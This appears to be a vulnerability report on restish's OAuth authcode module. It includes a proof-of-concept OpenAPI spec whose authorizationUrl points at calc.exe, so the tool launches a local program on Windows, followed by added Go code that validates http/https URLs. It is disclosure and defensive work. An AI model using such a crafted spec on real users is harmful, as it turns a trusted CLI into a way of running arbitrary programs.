Hey there team, found another issue.
This time it's in the oauth/authcode.go module: https://github.com/rest-sh/restish/blob/main/oauth/authcode.go#L145
This runs whatever is in the authorizationURL as `cmd.exe \c start {URL}`. However, this does not check that it's a valid http or https schema. So something like this can open calc.exe:
```yaml
openapi: "3.1.0"
info:
  title: oauuth windows rce test
  version: "1.0"
servers:
  - url: https://test.armitagesarchive.com
security:
  - evil_oauth: []
paths:
  /test:
    get:
      responses:
        "200":
          description: ok
components:
  securitySchemes:
    evil_oauth:
      type: oauth2
      flows:
        authorizationCode:
          authorizationUrl: file:///C:/Windows/System32/calc.exe
          tokenUrl: https://test.armitagesarchive.com
          scopes: {}
```
Tested on Windows 11 with restish v0.21.2
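
Added example, not part of the original report and not restish's own code: one way to close the gap described above is to accept only absolute http/https URLs that name a host before the `authorizationUrl` value is handed to the OS opener. The helper name `validateBrowserURL` and the sample inputs other than the reported `file:///` value are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
)

// errBadScheme marks URLs whose scheme is not http or https.
var errBadScheme = errors.New("authorization URL scheme must be http or https")

// validateBrowserURL is a hypothetical helper (not restish's own code).
// It accepts only absolute http/https URLs that name a host, so a value read
// from an untrusted OpenAPI document never reaches the OS "open" handler as
// file:// or a bare path.
func validateBrowserURL(raw string) (*url.URL, error) {
	u, err := url.Parse(raw) // also rejects control characters
	if err != nil {
		return nil, fmt.Errorf("unparseable authorization URL: %w", err)
	}
	// url.Parse lowercases the scheme, so "HTTPS" compares equal to "https".
	if u.Scheme != "http" && u.Scheme != "https" {
		return nil, fmt.Errorf("%w (got %q)", errBadScheme, u.Scheme)
	}
	// Forms such as "https:calc.exe" or "https:///x" parse without a host.
	if u.Hostname() == "" {
		return nil, errors.New("authorization URL has no host")
	}
	return u, nil
}

func main() {
	// Constructed inputs; the first is the value from the report above.
	for _, raw := range []string{
		"file:///C:/Windows/System32/calc.exe",
		`C:\Windows\System32\calc.exe`,
		"https:calc.exe",
		"https://test.armitagesarchive.com/authorize?client_id=x",
	} {
		if u, err := validateBrowserURL(raw); err != nil {
			fmt.Printf("reject %q: %v\n", raw, err)
		} else {
			fmt.Printf("allow  %s\n", u)
		}
	}
}
```

The check belongs immediately before the platform-specific open call, so every OS path gets the same allow-list regardless of how the URL is launched.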